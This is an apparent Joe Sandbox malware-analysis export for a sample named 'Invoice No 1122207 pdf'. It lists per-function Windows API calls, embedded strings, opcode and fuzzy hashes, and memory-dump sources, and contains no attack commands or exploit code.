Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 2110be54afd7c1ba41fa290d5ea730e80defa3073dbb3dd6d0f96e152a0d4389
Instruction ID: 0698786d47ba9e68c8ff4849903cbcedee9b381c6aae5198ddae73ed37c08107
Opcode Fuzzy Hash: 2110be54afd7c1ba41fa290d5ea730e80defa3073dbb3dd6d0f96e152a0d4389
Instruction Fuzzy Hash: BFB1DE316083029BC310EF29C890A6FB7E5AFE5724F504D1FF59697291E738E845CB5A

Function 004A911E Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00429BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00429BB2

DragQueryPoint.SHELL32(?,?), ref: 004A9147

Part of subcall function 004A7674: ClientToScreen.USER32(?,?), ref: 004A769A
Part of subcall function 004A7674: GetWindowRect.USER32(?,?), ref: 004A7710
Part of subcall function 004A7674: PtInRect.USER32(?,?,004A8B89), ref: 004A7720

SendMessageW.USER32(?,000000B0,?,?), ref: 004A91B0
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 004A91BB
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 004A91DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 004A9225
SendMessageW.USER32(?,000000B0,?,?), ref: 004A923E
SendMessageW.USER32(?,000000B1,?,?), ref: 004A9255
SendMessageW.USER32(?,000000B1,?,?), ref: 004A9277
DragFinish.SHELL32(?), ref: 004A927E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 004A9371

Strings

@GUI_DROPID, xrefs: 004A929E
p#N, xrefs: 004A92BB
@GUI_DRAGFILE, xrefs: 004A9320
@GUI_DRAGID, xrefs: 004A92E9

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#N
API String ID: 221274066-3777839306
Opcode ID: 5deca086c05bfdc595f3e65bdfd2dd09d98b4465bdc5ddcee6864d4d5f56e490
Instruction ID: 1a6b1795c3cc3da4ae714f8f05d55f9eeb9ab44cdba21cae6a91b786647a3ec2
Opcode Fuzzy Hash: 5deca086c05bfdc595f3e65bdfd2dd09d98b4465bdc5ddcee6864d4d5f56e490
Instruction Fuzzy Hash: 56618D71108300AFC701EF65DC85EAFBBE8EF99354F00092EF595931A1DB749A49CB9A

Function 0049AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0049B198
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0049B1B0
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0049B1D4
_wcslen.LIBCMT ref: 0049B200
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0049B214
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0049B236
_wcslen.LIBCMT ref: 0049B332

Part of subcall function 004805A7: GetStdHandle.KERNEL32(000000F6), ref: 004805C6

_wcslen.LIBCMT ref: 0049B34B
_wcslen.LIBCMT ref: 0049B366
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0049B3B6
GetLastError.KERNEL32(00000000), ref: 0049B407
CloseHandle.KERNEL32(?), ref: 0049B439
CloseHandle.KERNEL32(00000000), ref: 0049B44A
CloseHandle.KERNEL32(00000000), ref: 0049B45C
CloseHandle.KERNEL32(00000000), ref: 0049B46E
CloseHandle.KERNEL32(?), ref: 0049B4E3

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: b1174f0f879bfb424ed19c484506ba69ad1efbace93a8be377dd84d9bbaa6a70
Instruction ID: 25048c09a4b289408e7811efd2d9f096f84f233f76021500413f10eee37acff8
Opcode Fuzzy Hash: b1174f0f879bfb424ed19c484506ba69ad1efbace93a8be377dd84d9bbaa6a70
Instruction Fuzzy Hash: B2F18F315042009FCB14EF25D985B6FBBE1EF85314F14856EF8855B2A2DB39EC44CB9A

Function 0041326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(004E1990), ref: 00452F8D
GetMenuItemCount.USER32(004E1990), ref: 0045303D
GetCursorPos.USER32(?), ref: 00453081
SetForegroundWindow.USER32(00000000), ref: 0045308A
TrackPopupMenuEx.USER32(004E1990,00000000,?,00000000,00000000,00000000), ref: 0045309D
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 004530A9

Strings

0, xrefs: 0041327D

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: 75b3e2320a797799ef73bd3b768323198f184201c7a5f854f09ed47c068707d2
Instruction ID: d52a3e0dce57be7f60c5b77a1431bcbed5ec4adafd949a2b997b8c1421e7ff8d
Opcode Fuzzy Hash: 75b3e2320a797799ef73bd3b768323198f184201c7a5f854f09ed47c068707d2
Instruction Fuzzy Hash: 7D716931640205BEEB219F24DC89FDBBF64FF02365F204217F9146A2E1C7B9A954DB98

Function 004A6CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 004A6DEB

Part of subcall function 00416B57: _wcslen.LIBCMT ref: 00416B6A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 004A6E5F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 004A6E81
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 004A6E94
DestroyWindow.USER32(?), ref: 004A6EB5
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00410000,00000000), ref: 004A6EE4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 004A6EFD
GetDesktopWindow.USER32 ref: 004A6F16
GetWindowRect.USER32(00000000), ref: 004A6F1D
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 004A6F35
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 004A6F4D

Part of subcall function 00429944: GetWindowLongW.USER32(?,000000EB), ref: 00429952

Strings

tooltips_class32, xrefs: 004A6E58, 004A6EDD
0, xrefs: 004A6D98

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: e0cd5f90fcd73690cf8c5ab392a1d1636a5a422d21d77e6fbddd6ac0f1e6dbee
Instruction ID: 480449d6847d523ead7291c8894ffbcea8572c8879d447d827b19be4b4543d40
Opcode Fuzzy Hash: e0cd5f90fcd73690cf8c5ab392a1d1636a5a422d21d77e6fbddd6ac0f1e6dbee
Instruction Fuzzy Hash: 16716B74144244AFDB21CF18DC84BABBBE9FB9A304F49042EF999873A1C774E905CB19

Function 0048C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0048C4B0
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0048C4C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0048C4D7
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0048C4F0
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0048C533
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0048C549
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0048C554
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0048C584
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0048C5DC
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0048C5F0
InternetCloseHandle.WININET(00000000), ref: 0048C5FB

Strings

, xrefs: 0048C575

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: 68fb875449e4cc42c6dca594d0758b07764563a79b01867c82de9594eaedf6e5
Instruction ID: e6696c870a8f472e951e1b2e8277b7b114244663c75e5189ff1b9eef0f6f2f84
Opcode Fuzzy Hash: 68fb875449e4cc42c6dca594d0758b07764563a79b01867c82de9594eaedf6e5
Instruction Fuzzy Hash: B0515DB5500205BFDB21AF61C9C8AAF7BFCFF09754F00482AF94596250DB38E9449B78

Function 004A856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 004A8592
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 004A85A2
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 004A85AD
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 004A85BA
GlobalLock.KERNEL32(00000000), ref: 004A85C8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 004A85D7
GlobalUnlock.KERNEL32(00000000), ref: 004A85E0
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 004A85E7
CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 004A85F8
OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,004AFC38,?), ref: 004A8611
GlobalFree.KERNEL32(00000000), ref: 004A8621
GetObjectW.GDI32(?,00000018,?), ref: 004A8641
CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 004A8671
DeleteObject.GDI32(?), ref: 004A8699
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004A86AF

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 3109d90dc184fdbb912968a58aa33ab52785152fe92feac7fc2717fb69d8b838
Instruction ID: e6ec7d9842439c99f61616a9e84471a96dcc8ccf038acd46d5fdce04b350a222
Opcode Fuzzy Hash: 3109d90dc184fdbb912968a58aa33ab52785152fe92feac7fc2717fb69d8b838
Instruction Fuzzy Hash: DF41FA75A00208BFDB519FA5DC88EAB7BB8FF9A711F144069F905E7260DB349901CB68

Function 004814BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00481502
VariantCopy.OLEAUT32(?,?), ref: 0048150B
VariantClear.OLEAUT32(?), ref: 00481517
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 004815FB
VarR8FromDec.OLEAUT32(?,?), ref: 00481657
VariantInit.OLEAUT32(?), ref: 00481708
SysFreeString.OLEAUT32(?), ref: 0048178C
VariantClear.OLEAUT32(?), ref: 004817D8
VariantClear.OLEAUT32(?), ref: 004817E7
VariantInit.OLEAUT32(00000000), ref: 00481823

Strings

Default, xrefs: 004816AF
%4d%02d%02d%02d%02d%02d, xrefs: 00481625

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: 836043af0a8b59cc2fb6364b8761ffeb86d3869dee2e3419f3b7dda954c60cbb
Instruction ID: 1e7e7bfefe4b90ca68e4988ad8633cfb91fafc46916d762e6377b0326fef6c0c
Opcode Fuzzy Hash: 836043af0a8b59cc2fb6364b8761ffeb86d3869dee2e3419f3b7dda954c60cbb
Instruction Fuzzy Hash: 62D11571600111EBDB00AF69E884B7DB7B9BF45700F50886BF446AB2A0DB38DC47DB5A

Function 0049B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00419CB3: _wcslen.LIBCMT ref: 00419CBD

Part of subcall function 0049C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0049B6AE,?,?), ref: 0049C9B5
Part of subcall function 0049C998: _wcslen.LIBCMT ref: 0049C9F1
Part of subcall function 0049C998: _wcslen.LIBCMT ref: 0049CA68
Part of subcall function 0049C998: _wcslen.LIBCMT ref: 0049CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0049B6F4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0049B772
RegDeleteValueW.ADVAPI32(?,?), ref: 0049B80A
RegCloseKey.ADVAPI32(?), ref: 0049B87E
RegCloseKey.ADVAPI32(?), ref: 0049B89C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 0049B8F2
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0049B904
RegDeleteKeyW.ADVAPI32(?,?), ref: 0049B922
FreeLibrary.KERNEL32(00000000), ref: 0049B983
RegCloseKey.ADVAPI32(00000000), ref: 0049B994

Strings

RegDeleteKeyExW, xrefs: 0049B8FE
advapi32.dll, xrefs: 0049B8ED

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: 169c86d5270ca6ab56703a8a27e2f9cfa6333bd422e81f577998e396fb1ebb71
Instruction ID: fa615ed0b01782387e58b718d2a11691133ab1bdceb8145f8568586ea849ea40
Opcode Fuzzy Hash: 169c86d5270ca6ab56703a8a27e2f9cfa6333bd422e81f577998e396fb1ebb71
Instruction Fuzzy Hash: DAC18F70204201AFDB10DF15D594F2ABBE5FF84308F1485AEE5994B3A2C779EC46CB95

Function 0049255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 004925D8
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004925E8
CreateCompatibleDC.GDI32(?), ref: 004925F4
SelectObject.GDI32(00000000,?), ref: 00492601
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0049266D
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 004926AC
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 004926D0
SelectObject.GDI32(?,?), ref: 004926D8
DeleteObject.GDI32(?), ref: 004926E1
DeleteDC.GDI32(?), ref: 004926E8
ReleaseDC.USER32(00000000,?), ref: 004926F3

Strings

(, xrefs: 0049268D

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 0d37d95e6c4f5e615e8182e14a31c6a13cf6fca721b3d6f5f7afedfe85c41215
Instruction ID: afe30b257a05467c9fec05000a697a3f78429f877108e9f3009296d23cb2d67e
Opcode Fuzzy Hash: 0d37d95e6c4f5e615e8182e14a31c6a13cf6fca721b3d6f5f7afedfe85c41215
Instruction Fuzzy Hash: 6561D1B5E00219EFCF05CFA4D984AAEBBB5FF48310F20852AE955A7250E774A941CF94

Function 0044DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0044DAA1

Part of subcall function 0044D63C: _free.LIBCMT ref: 0044D659
Part of subcall function 0044D63C: _free.LIBCMT ref: 0044D66B
Part of subcall function 0044D63C: _free.LIBCMT ref: 0044D67D
Part of subcall function 0044D63C: _free.LIBCMT ref: 0044D68F
Part of subcall function 0044D63C: _free.LIBCMT ref: 0044D6A1
Part of subcall function 0044D63C: _free.LIBCMT ref: 0044D6B3
Part of subcall function 0044D63C: _free.LIBCMT ref: 0044D6C5
Part of subcall function 0044D63C: _free.LIBCMT ref: 0044D6D7
Part of subcall function 0044D63C: _free.LIBCMT ref: 0044D6E9
Part of subcall function 0044D63C: _free.LIBCMT ref: 0044D6FB
Part of subcall function 0044D63C: _free.LIBCMT ref: 0044D70D
Part of subcall function 0044D63C: _free.LIBCMT ref: 0044D71F
Part of subcall function 0044D63C: _free.LIBCMT ref: 0044D731

_free.LIBCMT ref: 0044DA96

Part of subcall function 004429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0044D7D1,00000000,00000000,00000000,00000000,?,0044D7F8,00000000,00000007,00000000,?,0044DBF5,00000000), ref: 004429DE
Part of subcall function 004429C8: GetLastError.KERNEL32(00000000,?,0044D7D1,00000000,00000000,00000000,00000000,?,0044D7F8,00000000,00000007,00000000,?,0044DBF5,00000000,00000000), ref: 004429F0

_free.LIBCMT ref: 0044DAB8
_free.LIBCMT ref: 0044DACD
_free.LIBCMT ref: 0044DAD8
_free.LIBCMT ref: 0044DAFA
_free.LIBCMT ref: 0044DB0D
_free.LIBCMT ref: 0044DB1B
_free.LIBCMT ref: 0044DB26
_free.LIBCMT ref: 0044DB5E
_free.LIBCMT ref: 0044DB65
_free.LIBCMT ref: 0044DB82
_free.LIBCMT ref: 0044DB9A

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: c105ba9458f2702fb0df8d2a44a6a4991dc3ad4c0ac3a8d1d5cfe33d60b762af
Instruction ID: 0fbc7f903a6bfa94f2bcc192590e3471ce0bd6f3987e2933896b359906d1fcbb
Opcode Fuzzy Hash: c105ba9458f2702fb0df8d2a44a6a4991dc3ad4c0ac3a8d1d5cfe33d60b762af
Instruction Fuzzy Hash: 51316AB1A046459FFB21AA3AE945B5BB7E9FF00314F51442BF049D7291DA78AC40C728

Function 0047365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0047369C
_wcslen.LIBCMT ref: 004736A7
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00473797
GetClassNameW.USER32(?,?,00000400), ref: 0047380C
GetDlgCtrlID.USER32(?), ref: 0047385D
GetWindowRect.USER32(?,?), ref: 00473882
GetParent.USER32(?), ref: 004738A0
ScreenToClient.USER32(00000000), ref: 004738A7
GetClassNameW.USER32(?,?,00000100), ref: 00473921
GetWindowTextW.USER32(?,?,00000400), ref: 0047395D

Strings

%s%u, xrefs: 00473734

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
String ID: %s%u
API String ID: 4010501982-679674701
Opcode ID: 13adf036d96e73583cd3ca5af943495822b2f0595197acb22a253dd63bad7628
Instruction ID: 7106b567ec3585191244bd828ee75418fe1e49136e2ca5b3a6696f0e1cf8f10d
Opcode Fuzzy Hash: 13adf036d96e73583cd3ca5af943495822b2f0595197acb22a253dd63bad7628
Instruction Fuzzy Hash: C691C3B1204206AFD718DF24C884BEBB7E8FF44315F00C52AFA9D82250DB38EA45DB95

Function 00474954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00474994
GetWindowTextW.USER32(?,?,00000400), ref: 004749DA
_wcslen.LIBCMT ref: 004749EB
CharUpperBuffW.USER32(?,00000000), ref: 004749F7
_wcsstr.LIBVCRUNTIME ref: 00474A2C
GetClassNameW.USER32(00000018,?,00000400), ref: 00474A64
GetWindowTextW.USER32(?,?,00000400), ref: 00474A9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00474AE6
GetClassNameW.USER32(?,?,00000400), ref: 00474B20
GetWindowRect.USER32(?,?), ref: 00474B8B

Strings

ThumbnailClass, xrefs: 00474A6F, 00474AF1

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: e577390550d1b67a338b1ec79352631ae2986711f97f059717827ab240553814
Instruction ID: 3e46f777533f94fe0d5f87b77e93d849d40ddff76415f2c031b173f9daee5041
Opcode Fuzzy Hash: e577390550d1b67a338b1ec79352631ae2986711f97f059717827ab240553814
Instruction Fuzzy Hash: 0D91AC711042059FDB05DE14C981BFBB7E8EF84314F04846BED899A296DB38ED45CBAA

